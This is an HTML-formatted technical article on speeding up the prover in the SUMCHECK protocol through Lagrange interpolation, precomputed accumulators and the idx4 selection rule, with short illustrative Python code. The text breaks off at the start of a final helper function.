&lt;p&gt;The core benefit for the verifier is a drastic reduction in computational work: the verifier could compute the sum by evaluating the polynomial at all $2^l$ possible inputs. However, using the SUMCHECK Protocol, the &lt;em&gt;verifier ultimately only needs to evaluate the polynomial at a single, randomly chosen point&lt;&#x2F;em&gt; in a larger finite field. This random point is selected from a “much bigger space” than just $\{0,1\}^l$.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;The protocol proceeds through an interactive series of rounds between the prover and the verifier:&lt;br &#x2F;&gt;
1. &lt;strong&gt;Initial Claim:&lt;&#x2F;strong&gt; At the start, the prover sends a value, $C_1$, which is claimed to be equal to the desired sum $H$.&lt;br &#x2F;&gt;
2. &lt;strong&gt;Iterative Reduction:&lt;&#x2F;strong&gt; The protocol involves $\ell$ rounds (where $\ell$ is the number of variables in the polynomial). In each round $j$ (from 1 to $\ell$):&lt;br &#x2F;&gt;
- The &lt;em&gt;prover sends a univariate polynomial&lt;&#x2F;em&gt; , $g_j(X_j)$, which is claimed to represent a partial sum of the original polynomial where the first $j-1$ variables have been “bound” to random values chosen by the verifier in previous rounds, and the $j$-th variable is left free. This process “gets rid of one variable in the sum check” in each round.&lt;br &#x2F;&gt;
- The &lt;em&gt;verifier performs consistency checks&lt;&#x2F;em&gt; on the received polynomial, notably checking if the current polynomial is consistent with the value established in the previous round (e.g., $C_1 = g_1(0) + g_1(1)$ in Round 1, and $g_{j - 1}(r_{j - 1}) = g_j(0) + g_j(1)$ in subsequent rounds). The verifier also checks that the degree of $g_j (X_j)$ is not too high.&lt;br &#x2F;&gt;
- If checks pass, the &lt;em&gt;verifier chooses a new random field element, $r_j$&lt;&#x2F;em&gt; , and sends it to the prover. This random choice serves to probabilistically verify the polynomial sent by the prover.&lt;br &#x2F;&gt;
3. &lt;strong&gt;Final Check:&lt;&#x2F;strong&gt; In the last round ($\ell$), the prover sends a univariate polynomial $g_\ell (X_\ell)$, which should be the original polynomial $g$ with the first $\ell - 1$ variables bound to the random values chosen so far and $X_\ell$ left free. The verifier then picks a final random $r_\ell$ and directly evaluates the original polynomial $g$ at the complete random point $(r_1, \dots, r_\ell)$, comparing this result to $g_\ell(r_\ell)$. If all checks pass, the verifier accepts the initial sum.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;A significant feature of the protocol is that the &lt;em&gt;verifier’s messages are simply random field elements&lt;&#x2F;em&gt; , independent of the input polynomial $g$ (except for needing an upper bound on its degree in each variable and the ability to evaluate it at a random point).&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
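&lt;p&gt;To make the round structure concrete, here is a minimal sketch in Python for the simplest case: a single multilinear polynomial $g$ given by its evaluations on the hypercube, so every $s_j$ has degree 1 and can be sent as the pair $(s_j(0), s_j(1))$. The field modulus and all names below are our own illustrative choices, not from any particular implementation.&lt;&#x2F;p&gt;

```python
import random

P = 2**31 - 1  # a prime modulus; any sufficiently large prime field works

def ml_eval(evals, point):
    # Evaluate the multilinear extension of `evals` at `point`,
    # folding one variable at a time (most significant bit first).
    for r in point:
        half = len(evals) // 2
        evals = [(evals[i] + r * (evals[half + i] - evals[i])) % P
                 for i in range(half)]
    return evals[0]

def sumcheck(evals, num_vars):
    claim = sum(evals) % P          # the prover's initial claim C_1 = H
    challenges, cur = [], list(evals)
    running = claim
    for _ in range(num_vars):
        half = len(cur) // 2
        s0 = sum(cur[:half]) % P    # s_j(0)
        s1 = sum(cur[half:]) % P    # s_j(1)
        # verifier's consistency check: s_j(0) + s_j(1) equals previous claim
        assert (s0 + s1) % P == running
        r = random.randrange(P)     # verifier's random challenge r_j
        challenges.append(r)
        cur = [(cur[i] + r * (cur[half + i] - cur[i])) % P
               for i in range(half)]
        running = (s0 + r * (s1 - s0)) % P  # s_j(r_j), degree-1 interpolation
    # final check: evaluate g directly at the full random point
    assert running == ml_eval(list(evals), challenges)
    return claim
```

&lt;p&gt;Running `sumcheck` on any evaluation table simply returns the verified sum; all the consistency checks happen inside the round loop.&lt;&#x2F;p&gt;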
&lt;p&gt;Before jumping under the hood, let’s talk notation. For brevity, we will simplify notation whenever the number of variables and the dimensions involved are clear from context. In this article we concentrate on polynomials in $\ell$ variables $X_1, X_2,\ldots X_{\ell}$, but for simplicity we adopt&lt;&#x2F;p&gt;
&lt;p&gt;$$f(X_1, X_2 , \ldots X_{\ell}) = f(X)$$&lt;&#x2F;p&gt;
&lt;p&gt;as standard notation. When these $\ell$ variables get partitioned, we also use a single letter to denote each limb: say we split $X$ into three parts&lt;&#x2F;p&gt;
&lt;p&gt;$$(X_1, X_2 ,\ldots X_{\ell}) = (Y_1 , Y_2, \ldots Y_{i - 1},X_i, x^\prime_{i + 1},\ldots x^\prime_{\ell})$$&lt;&#x2F;p&gt;
&lt;p&gt;then we simply use $(Y, X_i , x^\prime)$ to avoid cumbersome indexing.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;the-setting&quot;&gt;The setting&lt;&#x2F;h3&gt;
&lt;p&gt;The authors focus on a specific setting for the SUMCHECK, useful in various contexts: they narrow their attention to the case where the polynomial $g$ that is the object of the SUMCHECK claim can be written as a product of $d$ multilinear polynomials&lt;&#x2F;p&gt;
&lt;p&gt;$$g(X) = \prod\limits_{k = 1}^d p_k(X)$$&lt;&#x2F;p&gt;
&lt;p&gt;where by multilinear polynomial we mean an $\ell$-variate polynomial such that in each of its monomials every variable is raised to a power that is either 0 or 1. These polynomials are of great use: they appear throughout the field theory literature in different guises and recently re-emerged as useful objects in Ben Diamond and Jim Posen’s effort BINIUS. For the unfamiliar reader, we recommend a quick read of our self-contained primer on these objects, &lt;a href=&quot;&#x2F;multilinear-polynomials-survival-kit&#x2F;&quot;&gt;Multilinear polynomials: a basic survival guide&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;a-closer-look&quot;&gt;A closer look&lt;&#x2F;h2&gt;
&lt;p&gt;The key observation behind the optimizations rests on the structure of the polynomial sent in the $i$-th round by the prover:&lt;&#x2F;p&gt;
&lt;p&gt;$$s_i (X_i) = \sum\limits_{x^\prime \in \{0,1\}^{\ell - i}} \prod\limits_{ k = 1 }^d p_k(r, X_i ,x^\prime)$$&lt;&#x2F;p&gt;
&lt;p&gt;is indeed a sum of univariate polynomials in the variable $X_i$. Polynomials are usually handed over between prover and verifier by passing their evaluations on an adequate set: from the evaluations of $s_i$ on a sufficiently large set, the verifier is able to reconstruct the polynomial from the data received.&lt;&#x2F;p&gt;
&lt;p&gt;How big should the evaluation set be? This question was answered long ago: since a nonzero polynomial of degree $d$ has at most $d$ roots, a polynomial $f$ is fully determined by $\deg(f) + 1$ evaluations. So the prover needs to send $\deg(s_i) + 1$ evaluations to the verifier, and now the problem becomes sending the elements&lt;&#x2F;p&gt;
&lt;p&gt;$$s_i (u) = \sum\limits_{x^\prime \in \{0,1\}^{\ell -i }}\prod\limits_{ k = 1}^d p_k(r,u,x^\prime)$$&lt;&#x2F;p&gt;
&lt;p&gt;for all $u$ in a set of size at least $\deg(s_i) + 1$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;the-key-insight&quot;&gt;The key insight&lt;&#x2F;h3&gt;
&lt;p&gt;The key insight is that the elements being summed for each $s_i (u)$, namely&lt;&#x2F;p&gt;
&lt;p&gt;$$\prod\limits_{ k = 1 }^d p_k(r,u,x^\prime)$$&lt;&#x2F;p&gt;
&lt;p&gt;are not only products of evaluations of multilinear factors; there are also &lt;em&gt;different types of evaluations going on&lt;&#x2F;em&gt; in each summand:&lt;&#x2F;p&gt;
&lt;p&gt;i. On the one hand, the factors $p_k$ are evaluated at $r = (r_1 ,r_2 ,\ldots r_{i - 1})$ in their first $i - 1$ variables. These evaluations involve interaction with the verifier, since they employ random elements chosen by the verifier from a much bigger space than the boolean cube (typically a field extension of the base field). Representing and algebraically manipulating these challenges takes up more memory and time than demanded by base field elements. In the context of BDDT, they involve $\frak{ll}$ and $\frak{ls}$ (large-large and large-small) multiplications.&lt;br &#x2F;&gt;
ii. On the other hand, we have $u$, which is simply a base field element, and the evaluations of the factors $p_k$ at points of the boolean hypercube $\{0,1\}^{ \ell - i}$ in the last $\ell - i$ variables: these evaluations need no interaction with the verifier and, crucially, do not involve elements of an extension of the base field. The multiplications involved are $\frak{ss}$ multiplications, since the operands are base field elements.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;This observation suggests the following idea: if it were possible to decouple these evaluations, there would be room for improving performance: evaluations not depending on the interaction with the verifier could be done offline as part of a pre-processing phase, while the ones involving the random challenges would be tackled online.&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;The good news is that Bagad, Dao, Domb and Thaler successfully pursue this stream of ideas by cleverly employing (once again) the notion of interpolation: a polynomial can be expressed as a sum of &lt;strong&gt;basis interpolation polynomials&lt;&#x2F;strong&gt; that can be &lt;strong&gt;precomputed&lt;&#x2F;strong&gt; and, more importantly, defined on an arbitrary large enough subset of the &lt;strong&gt;base field&lt;&#x2F;strong&gt;; evaluations at any desired challenge can then be computed by evaluating these auxiliary polynomials instead of the original polynomial.&lt;&#x2F;p&gt;
&lt;p&gt;To see how this decoupling can be done, let’s go through a very simple example. Suppose that a verifier asks us to evaluate a polynomial $f$ at a random challenge $r$. For concreteness, let&lt;&#x2F;p&gt;
&lt;p&gt;$$f(x) = 2x^2 - 3x + 1$$&lt;&#x2F;p&gt;
&lt;p&gt;Here’s how we use interpolation to perform the task: since $f$ has degree 2, we need at least 3 points to reconstruct $f$. Let’s pick the set&lt;br &#x2F;&gt;
$$\{0, 1, 2\}$$&lt;&#x2F;p&gt;
&lt;p&gt;First, we need to find the value of our polynomial $f(x)$ at each of these points.&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$f(0) = 2(0)^2 - 3(0) + 1 = \mathbf{1}$&lt;&#x2F;li&gt;
&lt;li&gt;$f(1) = 2(1)^2 - 3(1) + 1 = \mathbf{0}$&lt;&#x2F;li&gt;
&lt;li&gt;$f(2) = 2(2)^2 - 3(2) + 1 = 8 - 6 + 1 = \mathbf{3}$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Secondly, we build the Lagrange basis for the set $\{0, 1, 2\}$: it has three degree 2 polynomials&lt;&#x2F;p&gt;
&lt;p&gt;$$\{L_0 ,L_1 ,L_2 \}$$&lt;br &#x2F;&gt;
that work just like the canonical basis: each basis polynomial $L_i(x)$ has the special property that&lt;&#x2F;p&gt;
&lt;p&gt;$$L_i (j) = 1\quad\text{ if } j = i,\quad L_i (j) = 0\quad\text{ if } j\neq i.$$&lt;&#x2F;p&gt;
&lt;p&gt;Lagrange’s formula for producing such polynomials is well known and produces&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;$L_0(x)$&lt;&#x2F;strong&gt; (associated with $x_0 = 0$): $$L_0(x) = 0.5x^2 - 1.5x + 1$$&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;$L_1(x)$&lt;&#x2F;strong&gt; (associated with $x_1 = 1$): $$L_1(x) = -x^2 + 2x$$&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;$L_2(x)$&lt;&#x2F;strong&gt; (associated with $x_2 = 2$): $$L_2(x) = 0.5x^2 - 0.5x$$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;These three polynomials form the &lt;strong&gt;Lagrange basis&lt;&#x2F;strong&gt; for the set $\{0, 1, 2\}$.&lt;&#x2F;p&gt;
&lt;p&gt;Finally, the interpolating polynomial is constructed as a weighted sum of these basis polynomials, where each weight is the value of the function at the corresponding point. We have&lt;&#x2F;p&gt;
&lt;p&gt;$$f(x) = f(0) \cdot L_0 (x) + f(1) \cdot L_1 (x) + f(2) \cdot L_2(x)$$&lt;br &#x2F;&gt;
This is&lt;&#x2F;p&gt;
&lt;p&gt;$$f(x) = \mathbf{1} \cdot (0.5x^2 - 1.5x + 1) + \mathbf{0} \cdot (-x^2 + 2x) + \mathbf{3} \cdot (0.5x^2 - 0.5x)$$&lt;&#x2F;p&gt;
&lt;p&gt;Now we’re ready to observe that $f$ can be expressed as a combination of polynomials (that are &lt;strong&gt;independent of the choice of $r$&lt;&#x2F;strong&gt; and auxiliary with respect to $f$) with weights being evaluations of $f$ at base field points chosen by the prover. In this sense, the computation of these scalars is also independent of the interaction with the verifier and can be done in a pre-processing phase.&lt;&#x2F;p&gt;
&lt;p&gt;It is only at this stage that the verifier hands over the random challenge $r$, and &lt;strong&gt;the prover computes $f(r)$ not by evaluating $f$ itself but by evaluating the basis polynomials $L_i$&lt;&#x2F;strong&gt; at $r$:&lt;&#x2F;p&gt;
&lt;p&gt;$$f(r) = f(0) L_0 (r) + f(1) L_1(r) + f(2) L_2(r)$$&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The takeaway is:&lt;&#x2F;strong&gt; evaluation of $f$ at the random challenges is deflected to evaluation of auxiliary polynomials that can be precomputed and that concentrate the heavier computational burden.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
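&lt;p&gt;The decoupling just described fits in a few lines of Python; the point set, names, and the concrete challenge below are our own illustrative choices. The offline phase evaluates $f$ at the base points; the online phase only touches the basis polynomials:&lt;&#x2F;p&gt;

```python
def lagrange_weights(xs, r):
    # Evaluate each Lagrange basis polynomial L_i for the nodes xs at r.
    ws = []
    for i, xi in enumerate(xs):
        w = 1.0
        for j, xj in enumerate(xs):
            if j != i:
                w *= (r - xj) / (xi - xj)
        ws.append(w)
    return ws

f = lambda x: 2 * x**2 - 3 * x + 1
xs = [0, 1, 2]
pre = [f(x) for x in xs]   # offline: f(0), f(1), f(2) -- no challenge needed

r = 5                      # online: the challenge arrives only now
ws = lagrange_weights(xs, r)
f_r = sum(v * w for v, w in zip(pre, ws))
assert f_r == f(r) == 36
```

&lt;p&gt;Note that the heavier loop lives entirely in `lagrange_weights`, which never sees $f$ itself.&lt;&#x2F;p&gt;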
&lt;p&gt;Of course, this idea can be extrapolated to multivariate polynomials by the use of tensor products of univariate Lagrange bases. For instance, suppose we need to evaluate the polynomial&lt;&#x2F;p&gt;
&lt;p&gt;$$f(Y_1, Y_2) = Y_1 (2 + Y_2 )^2$$&lt;&#x2F;p&gt;
&lt;p&gt;It has degree 1 as a polynomial in $Y_1$ and degree 2 as a polynomial in $Y_2$. We will now interpolate $f$ over the grid $\{0,1,2\}^2$; the next step is to find bivariate polynomials that play the same role as the univariate Lagrange polynomials. Unsurprisingly, if we consider the univariate basis&lt;&#x2F;p&gt;
&lt;p&gt;$$\{L_0 ,L_1 ,L_2\}$$&lt;&#x2F;p&gt;
&lt;p&gt;and define $L_{i,j} (Y_1 ,Y_2) = L_i (Y_1) L_j (Y_2)$ then the collection&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathcal{L} = \{L_{i,j}: (i,j)\in\{0,1,2\}^2\}$$&lt;&#x2F;p&gt;
&lt;p&gt;will verify&lt;&#x2F;p&gt;
&lt;p&gt;$$L_{i,j} (a,b) = 1\quad\text{ if } (a,b) = (i,j),\quad L_{i,j}(a,b) = 0\quad\text{ if } (a,b)\neq (i,j)$$&lt;&#x2F;p&gt;
&lt;p&gt;and so&lt;&#x2F;p&gt;
&lt;p&gt;$$f(Y_1,Y_2) = \sum\limits_{(i,j)\in \{0,1,2\}^2} f(i,j) L_{i,j}(Y_1, Y_2)$$&lt;&#x2F;p&gt;
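&lt;p&gt;A quick Python check of the tensor-product construction, in exact rational arithmetic; the evaluation point is an arbitrary choice of ours:&lt;&#x2F;p&gt;

```python
from fractions import Fraction

def lag(xs, i, t):
    # L_i(t) for the node set xs, computed exactly
    v = Fraction(1)
    for j, xj in enumerate(xs):
        if j != i:
            v *= Fraction(t - xj, xs[i] - xj)
    return v

f = lambda y1, y2: y1 * (2 + y2)**2   # degree 1 in Y1, degree 2 in Y2
xs = [0, 1, 2]                        # the grid is xs x xs
y1, y2 = 7, 4                         # an arbitrary evaluation point
recon = sum(f(i, j) * lag(xs, i, y1) * lag(xs, j, y2)
            for i in xs for j in xs)
assert recon == f(y1, y2) == 252
```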
&lt;h2 id=&quot;pushing-forward&quot;&gt;Pushing forward&lt;&#x2F;h2&gt;
&lt;p&gt;The previous discussion comes to fruition within the SUMCHECK protocol when we interpret&lt;&#x2F;p&gt;
&lt;p&gt;$$\prod\limits_{ k = 1}^d p_k(r,u ,x^\prime)$$&lt;&#x2F;p&gt;
&lt;p&gt;for fixed $x^\prime$ in the boolean hypercube $\{0,1\}^{ \ell - i}$ and $u$ in a convenient subset of the base field, as the evaluation of the polynomial&lt;&#x2F;p&gt;
&lt;p&gt;$$F_{u,x^\prime} (Y_1 ,Y_2 ,\ldots,Y_{i - 1}) = \prod\limits_{k = 1}^d p_k(Y,u,x^\prime)$$&lt;&#x2F;p&gt;
&lt;p&gt;at the random challenge $r = (r_1 ,r_2 ,\ldots r_{ i - 1})$. Again, for simplicity we will adopt the more reasonable notation&lt;&#x2F;p&gt;
&lt;p&gt;$$F(Y) = \prod\limits_{ k = 1}^d p_k(Y,u,x^\prime)$$&lt;&#x2F;p&gt;
&lt;p&gt;Also at this point, we will generically suppose that each of the factors $p_k$ indeed includes $X_i$ as a variable; in that case, the polynomial $s_i (X_i)$ that the prover needs to evaluate has degree $d$, and therefore we need a subset of at least $d + 1$ elements to interpolate it.&lt;&#x2F;p&gt;
&lt;p&gt;For concreteness, suppose we pick a subset $U_d$ in the base field with $d + 1$ points. We will then consider the grid&lt;&#x2F;p&gt;
&lt;p&gt;$$G_d = U_d\times\cdots\times U_d = U_d^{\,i - 1}$$&lt;&#x2F;p&gt;
&lt;p&gt;to build our multivariate Lagrange polynomials $L_v(Y)$ with $v\in G_d$. For simplicity, we are omitting $i$ from the notation for the grid.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Now interpolating $F$ with the multivariate Lagrange basis will transform this $F$ into a sum indexed by a grid of points $v\in G_d$ with small coordinates, weighted with coefficients being the evaluations of $F$ at base field elements&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;$$F(Y) = \sum\limits_{v\in G_d} F(v) L_v (Y)$$&lt;&#x2F;p&gt;
&lt;p&gt;Now at the time of looking at $s_i (u)$, remember that we need to sum over the hypercube of the last $\ell - 1$ coordinates and that $u$ is now the evaluation of the $X_i$ variable. The point here is that we realize that &lt;strong&gt;the sum over the hypercube interacts nicely with the sum coming from the interpolation: we will now make explicit the dependence of F with $u$ and $x^\prime$&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;$$s_i (u) = \sum\limits_{x^\prime \in \{0,1\}^{ \ell - i}} F_{u,x^\prime }(r) = \sum\limits_{x^\prime \in \{0,1\}^{ \ell - i}} \sum\limits_{v\in G_d} F_{ u,x^\prime } (v) L_v(r) = \sum\limits_{v\in G_d} \left(\sum\limits_{ x^\prime\in \{0,1\}^{ \ell - i}} F_{u,x^\prime}(v)\right) L_v(r)$$&lt;&#x2F;p&gt;
&lt;p&gt;From this expression we can see why this strategy works: the desired values $s_i(u)$ to be sent to the verifier are simply linear combinations of the precomputed interpolation polynomials evaluated at the random challenges (these evaluations are where the large multiplications live), weighted by sums, indexed by the hypercube, of pre-computed evaluations over base field grid vectors, that is, &lt;em&gt;small&lt;&#x2F;em&gt; coefficients.&lt;&#x2F;p&gt;
&lt;p&gt;The coefficients in this linear combination are termed &lt;strong&gt;accumulators&lt;&#x2F;strong&gt;, mainly because they are sums. For each fixed $v\in G_d$ and $u$, we have&lt;&#x2F;p&gt;
&lt;p&gt;$$\sum\limits_{x^\prime \in \{0,1\}^{ \ell - i}} F_{u,x^\prime}(v) = \sum\limits_{x^\prime \in \{0,1\}^{ \ell - i}} \prod\limits_{ k = 1}^d p_k(v,u,x^\prime) = A_i(v,u)$$&lt;&#x2F;p&gt;
&lt;p&gt;None of these depend on interaction with the verifier, so they can be conveniently handled offline. The number of accumulators to be computed depends on the degree of the polynomial $s_i (X_i)$ to be sent; that problem can be addressed generically by assuming it is a degree $d$ polynomial, or by refining the count at each round by deciding how many factors indeed contain the interesting variable.&lt;&#x2F;p&gt;
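&lt;p&gt;The accumulator strategy can be sketched for a tiny instance: $\ell = 3$ variables, $d = 2$ toy multilinear factors of our own choosing, and round $i = 2$, so that $v$ ranges over a single coordinate and $x^\prime$ over one boolean variable. The offline accumulators reproduce the online sums exactly:&lt;&#x2F;p&gt;

```python
from fractions import Fraction

def lag(xs, i, t):
    # i-th Lagrange basis polynomial for nodes xs, evaluated exactly at t
    v = Fraction(1)
    for j, xj in enumerate(xs):
        if j != i:
            v *= Fraction(t - xj, xs[i] - xj)
    return v

# two toy multilinear factors in three variables (our own examples)
p1 = lambda a, b, c: 1 + 2*a + 3*b + 5*c + a*b
p2 = lambda a, b, c: 4 + a + b*c

U = [0, 1, 2]   # d + 1 = 3 base field nodes suffice for a degree-2 round poly

# offline: accumulators A_2(v, u), summing over the last boolean variable
A = {(v, u): sum(p1(v, u, x) * p2(v, u, x) for x in (0, 1))
     for v in U for u in U}

r1 = 123        # online: the round-1 challenge arrives only now
for u in U:
    via_accumulators = sum(A[v, u] * lag(U, i, r1) for i, v in enumerate(U))
    direct = sum(p1(r1, u, x) * p2(r1, u, x) for x in (0, 1))
    assert via_accumulators == direct
```

&lt;p&gt;Every entry of `A` is built from base field (small) multiplications; only the final combination with $L_v(r_1)$ touches the challenge.&lt;&#x2F;p&gt;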
&lt;h3 id=&quot;optimizing-the-pre-computation-phase&quot;&gt;Optimizing the pre-computation phase&lt;&#x2F;h3&gt;
&lt;p&gt;Much work can still be done in the pre-computation phase, thanks to the nature of the indexing of the elements in the grid and the structure of the coefficients. The authors propose an algorithm coined $idx4$, which is simply a selection rule. Its function is to determine which accumulators $A_i (v,u)$ a product term contributes to, allowing that term to be calculated only once and then reused efficiently.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The Goal: Reusing Calculations.&lt;&#x2F;strong&gt; Instead of re-calculating all products for each accumulator, the optimization computes each product term $P$ just once and then distributes it to all corresponding accumulators. The $idx4$ function is the mechanism that decides “where each product $P$ goes”.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;You can think of $idx4$ as a pattern matching or deconstruction function. Its job is to take an evaluation prefix $\beta$ and see how many valid accumulator patterns it fits into.&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Input:&lt;&#x2F;strong&gt; A prefix $\beta = (\beta_1, \dots, \beta_{\ell})$, where each $\beta_j$ belongs to the set of evaluation points $U_d$.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Process:&lt;&#x2F;strong&gt; For each round $i$ (from $1$ to $\ell$), $idx4$ tries to decompose $\beta$ into three parts that match the structure of an accumulator $A_i (v,u)$:
&lt;ol&gt;
&lt;li&gt;$v = (\beta_1, \dots, \beta_{i-1})$: the prefix corresponding to the challenges from previous rounds.&lt;&#x2F;li&gt;
&lt;li&gt;$u = \beta_i$: the evaluation point for the current round $i$.&lt;&#x2F;li&gt;
&lt;li&gt;$y = (\beta_{i+1}, \dots, \beta_{\ell})$: the remaining suffix.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;The Key Selection Condition:&lt;&#x2F;strong&gt; The selection rule is simple: the decomposition for a given round $i$ is only valid if the suffix $y$ is composed &lt;strong&gt;exclusively of binary values (0s and 1s)&lt;&#x2F;strong&gt;. If any element in $y$ is non-binary, then the prefix $\beta$ does not contribute to any accumulator for round $i$.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Output:&lt;&#x2F;strong&gt; The function returns the set of all valid tuples $(i, v, u, y)$ that can be formed from the input $\beta$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
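&lt;p&gt;The selection rule reads naturally as a short Python function (a sketch of ours, following the description above rather than the paper’s pseudocode):&lt;&#x2F;p&gt;

```python
def idx4(beta):
    # Deconstruct an evaluation prefix beta into every tuple (i, v, u, y)
    # whose suffix y is composed exclusively of binary values; beta then
    # contributes to the accumulator A_i(v, u) for each tuple returned.
    out = []
    ell = len(beta)
    for i in range(1, ell + 1):
        v = beta[:i - 1]
        u = beta[i - 1]
        y = beta[i:]
        if all(b in (0, 1) for b in y):
            out.append((i, v, u, y))
    return out
```

&lt;p&gt;For example, with $U_d = \{0,1,2\}$ the prefix $(2,0,1)$ fits a valid pattern for every round, while $(0,2,2)$ only contributes in the last round, where the suffix is empty.&lt;&#x2F;p&gt;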
&lt;p&gt;This selection process is carried out within the pre-computation phase, the typical flow being as follows:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;The algorithm iterates over every possible evaluation prefix $\beta \in (U_d)^{\ell}$.&lt;&#x2F;li&gt;
&lt;li&gt;For a given $\beta$, it computes the product term $P = \prod_{ k = 1 }^{d} p_k(\beta)$.&lt;&#x2F;li&gt;
&lt;li&gt;It calls the function $idx4(\beta)$ to get the set of destination indices $\mathcal{I}$.&lt;&#x2F;li&gt;
&lt;li&gt;Finally, it iterates over each tuple $(i, v, u, y)$ in $\mathcal{I}$ and adds the value of $P$ to the corresponding accumulator $A_i (v,u)$.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;h2 id=&quot;choices-for-interpolation&quot;&gt;Choices for interpolation&lt;&#x2F;h2&gt;
&lt;p&gt;So far we have expanded on the general principles of decoupling the different types of evaluations via Lagrange interpolation. However, BDDT dive deeper into the details and slightly modify the interpolation basis involved, to exploit the fact that the factors of $g$ are indeed &lt;em&gt;multilinear&lt;&#x2F;em&gt; polynomials.&lt;&#x2F;p&gt;
&lt;p&gt;The variant of Lagrange interpolation presented by the authors reconstructs a polynomial of degree $d$ using its evaluations at $d$ distinct points plus its leading (highest-degree) coefficient, instead of the typical $d + 1$ evaluations. This leading coefficient is termed the &lt;em&gt;evaluation at infinity&lt;&#x2F;em&gt; and is denoted as $s(\infty)$.&lt;&#x2F;p&gt;
&lt;p&gt;The formula used for interpolation then becomes:&lt;br &#x2F;&gt;
$$s(X) = a \cdot \prod_{ k = 1}^{d} (X - x_k ) + \sum_{k = 1}^{d} s(x_k ) \cdot L_k (X)$$&lt;&#x2F;p&gt;
&lt;p&gt;Where:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$a$ is the leading coefficient of $s(X)$, also denoted $s(\infty)$.&lt;&#x2F;li&gt;
&lt;li&gt;$x_1, \dots, x_d$ are the $d$ distinct evaluation points.&lt;&#x2F;li&gt;
&lt;li&gt;$s(x_k)$ is the evaluation of $s(X)$ at the point $x_k$.&lt;&#x2F;li&gt;
&lt;li&gt;$L_k(X)$ is the $k$-th Lagrange basis polynomial for the set of points $\{x_1, \dots, x_d\}$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Let’s cook up an example and show that this actually holds.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;toy-example-degree-2-polynomial&quot;&gt;Toy example: Degree 2 Polynomial&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s take the polynomial $s(X) = 3X^2 - 5X + 2$. In the BDDT approach, to fully encode this polynomial we need &lt;em&gt;only 2 evaluations and the leading coefficient&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;We begin by gathering the necessary information:&lt;&#x2F;strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Evaluation at infinity&lt;&#x2F;strong&gt;: the leading coefficient is $a = 3$. Therefore, $s(\infty) = 3$.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Evaluation points&lt;&#x2F;strong&gt;: we choose two distinct points, for example, $x_1 = 0$ and $x_2 = 1$.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Evaluations&lt;&#x2F;strong&gt;: $s(0) = 3(0)^2 - 5(0) + 2 = 2$ and $s(1) = 3(1)^2 - 5(1) + 2 = 0$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Now we construct the interpolation basis.&lt;&#x2F;strong&gt; The Lagrange basis polynomials for the points $\{0, 1\}$ are:
&lt;ul&gt;
&lt;li&gt;$L_1 (X) = \frac{X - 1}{0 - 1} = 1 - X$&lt;&#x2F;li&gt;
&lt;li&gt;$L_2 (X) = \frac{X - 0}{1 - 0} = X$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;The interpolation formula for $d = 2$ is:&lt;&#x2F;strong&gt; $$s(X) = s(\infty) \cdot (X - x_1) (X - x_2) + s(x_1) L_1 (X) + s(x_2) L_2 (X)$$&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Substituting the values:&lt;&#x2F;strong&gt; $$s(X) = 3 \cdot (X - 0)(X - 1) + 2 \cdot (1 - X) + 0 \cdot X$$&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Simplifying:&lt;&#x2F;strong&gt; $$s(X) = 3(X^2 - X) + 2 - 2X = 3X^2 - 3X + 2 - 2X = 3X^2 - 5X + 2$$&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;The result matches the original polynomial.&lt;&#x2F;p&gt;
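&lt;p&gt;The toy computation above can be checked mechanically; the helper below is a sketch of ours implementing the interpolation formula from $s(\infty)$ and $d$ evaluations:&lt;&#x2F;p&gt;

```python
def interp_with_infinity(a, xs, ys, t):
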